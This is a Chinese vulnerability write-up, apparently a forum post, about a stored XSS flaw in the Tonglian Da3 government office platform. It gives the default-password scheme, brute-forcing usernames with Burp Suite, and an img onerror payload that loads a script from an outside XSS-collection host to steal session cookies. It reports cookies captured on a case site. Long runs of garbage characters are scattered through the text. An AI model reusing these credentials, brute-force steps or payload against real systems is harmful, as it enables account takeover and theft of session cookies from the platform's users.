' x) U# c* t$ z" Z3 C8 J
6 R- Y! ?) I( D( Y$ x 同联Da3协同办公平台后台通用储存型xss漏洞) A8 E! ?1 |6 s- r/ J. C
. J/ [+ b! l+ A7 k! V7 I
' `& p) h: \+ } ^# F5 S8 P 平台简介:
( e1 t. M3 V3 h% r5 z) M
# f+ T Z; N/ G: t. I9 s ~" }
$ ?2 d5 z- I+ P+ K* l$ s& K % c: k: ]/ {, p" j
# b) x# {* r" j( m4 a
" ~6 U4 E8 I2 u4 ?5 R 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
0 N5 V1 o! M2 g+ }
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
0 r/ N# [5 j/ }' p同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
$ M- b6 ~ p: r& \
, ?. [ F% z) i8 F. A5 Y B8 K/ I4 i+ G. [* s
' d, l0 C* m& ?- o( n2 G
, ~3 S0 }/ q( z
9 G q" I# s8 ~4 B3 J) H5 H 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:1 |+ G. e4 B1 I% D: ]
* a2 ]/ L7 e# a- ^* B 0 D+ Z( d! L' r& O5 T) [ }, p5 N6 |% Y
$ ?4 h+ q7 b2 W+ t L h8 R. f! ~1 l
; n: c$ p5 N0 x/ b7 L, A; A( O+ e
5 {7 r7 ] C1 C/ ? http://1.1.1.1:7197/cap-aco/#(案例2-)
6 y. Z+ w( y8 l; B/ g+ R
3 b7 K, s( c* h9 u7 b" k6 S
8 D# q- c7 x1 T/ J* ] http://www.XXOO.com (案例1-官网网站)
! V d* W+ N+ l$ f" U
/ F5 L/ K; F. `$ X( `1 z) A2 v
- ]+ U4 P: }) Q: A
漏洞详情:
3 m; d* m+ V6 B, _2 S: T# ~) C
& i X$ R, a& `8 R4 }
, L) m1 w4 v# F9 P; s) I: n! ? 案例一、
9 W" I! h! C/ V9 |2 M
: J# y/ r5 P$ G. q* K8 A8 h3 A3 B$ v
' Q, q0 a9 P4 |( N3 Q 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试. Z# p0 j! t7 G( C1 y; T
3 [+ k Y" J" E+ k' V4 L0 g3 X
+ X8 t$ M$ T5 w* _; E3 L6 F, P5 u: l) Q
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
# i7 M i& k7 f: C
; ~5 P* d# R" g; W6 Z( n) B+ n
- M4 Y5 j1 D$ x- I; p$ o
T* a# f) j: s
M7 ?. ]+ k/ G+ I$ p( t2 Q 2 e4 Z9 B7 z+ }3 J& i* ]
+ N6 F, n1 k ~4 W* r
1 V' y0 H2 k N6 V* V
, O) l! V9 o9 z0 L$ r status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ! y( @8 ]8 j) w
+ c3 e7 Z- N+ f 8 s8 g6 U+ x' b {; I. F4 `% F9 E
' z" B/ x5 a3 a8 `6 F
8 D% \6 u% Z" n, E % Z% ?/ e. [( t" h* q) a1 G
+ Y" ]" K3 ~, Y" c
$ z0 w B0 y+ l! m/ [
: j9 z: J1 h O 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 2 v! e! w8 w: n9 E
/ E# d6 n0 g4 K" \3 o, y; X
1 ?6 \; a! V& a$ i1 x 3 \) r) r; s! k; l- S8 d; z9 D E* V
1 |$ }: l P- B3 Q7 Z3 X
8 H* C- h) l3 w! A
<img src=x
5 u& _1 A! N& I) v: G+ konerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
! T6 f* z9 Q/ A, H% S+ _
9 l( A( J% H9 c m+ C0 f
! s6 B1 K& L' Q* T; I4 E
( H" L ?0 {, {/ d
! a/ N% Z7 j! M+ H% m R
2 p7 _) b- `! _9 ~& r) o3 L( p
然后发送,接收cookie如图:
; I2 W n+ X: K$ ?& r
; R; m; b: f* U; V f; k
; Y4 m' c5 Z0 v3 U # M- L* o: F9 A! b" `8 M
$ }' E5 c8 `% _3 X( `+ q1 D- D
8 N4 L8 }7 @9 H/ ~( J( [ % X6 k# w O! j% J( l3 C( o
; g; z5 Q: X2 a& J v& o
& S$ Q( Q9 a, P+ o& q$ U3 n; [
" o+ H" o' S) ]1 ^
1 e. H& i( Q$ z. i. b9 r9 K5 o
* `! f& ~6 w# T 7 b: Z" f! j2 l9 z+ S
) t8 H: h* W* a0 ?! |
$ U& R0 R0 k3 ^) D0 n/ T7 m
! g! B3 a' p. G1 u
/ l1 X7 d# o4 J
5 @7 [, a/ R% T. v
- I( w \9 j P/ ?2 N
2 Y5 ?# G1 P3 [
, g$ J" w7 g, u- g; R* \9 ]
F* D# [4 V7 V# h
1 H y+ E+ `( O& S2 _! j
' W/ Y+ O2 ^/ w" J 案例2、 n7 m5 {: |8 T- F4 U
* a/ H8 v3 k3 J
K+ ]3 U% A/ H, K8 {! ]
前面步骤都一样,下面看效果图: # S+ Z: ~- \8 {* l1 j
X) e6 y/ j6 }
+ f: l6 i, x* o! p' B4 _
2 i) r( K$ c0 N$ \
7 S6 F9 ~& S6 r0 l # O- E' C* r' J, d
0 S/ Y2 m( O8 n
2 P _. F+ J) k! D7 a8 n, q/ B6 y2 o 5 O3 i1 o8 O% Z% a j
2 h. t3 g/ _& S _) T
5 `+ _- b+ l7 ~) O
! N+ w) r' x( e3 t l
3 b# K* J- M( b( \$ o
: D9 Q- `+ i: o% m. @0 r, b
9 R) z4 P8 b3 k
* O, j( z" P' p% m' e
( b; |5 D9 o- c7 \5 S
' j" s! n: A/ Z* l- F
; ^1 s/ e8 R8 ~
: y' R) H" p2 e7 W1 Q
/ V" w3 e6 q& t' F8 N" z ' W6 Y! v7 q5 ?7 K6 `5 h/ p
$ C& `. e8 K1 m
8 y/ {! I! z1 Y
' g. b4 S1 e4 a6 A* l- s; o1 h* w
$ Q, a* f! O; ^. g+ F) R+ y. l
* C1 {: E/ j" U c9 S
, u7 K' } {/ g4 O \% t0 d
/ T) D, ]$ g5 y/ V6 U